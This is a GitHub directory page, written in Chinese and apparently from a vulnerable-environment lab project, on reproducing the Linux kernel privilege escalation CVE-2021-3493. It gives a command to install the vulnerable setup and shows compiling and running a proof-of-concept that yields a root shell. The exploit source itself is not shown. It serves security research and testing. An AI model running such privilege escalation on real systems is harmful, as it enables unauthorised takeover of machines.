Skip to content

Latest commit

 

History

History

kernel-cve-2021-3493

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

Linux内核漏洞导致权限提升(CVE-2021-3493)

场景介绍

请参考ssd-disclosure的文章,下文的PoC来自同样来自这篇文章。

环境搭建

宿主机环境:

  • Ubuntu 18.04

首先切换内核,直接通过Metarget安装环境

./metarget cnv install cve-2021-3493 --verbose

漏洞复现

gcc -o poc poc.c

编译好poc.c,执行即可。例如:

ubuntu@test:~$ ls
poc.c
ubuntu@test:~$ gcc -o poc poc.c
ubuntu@test:~$ ./poc
bash-4.4# whoami
root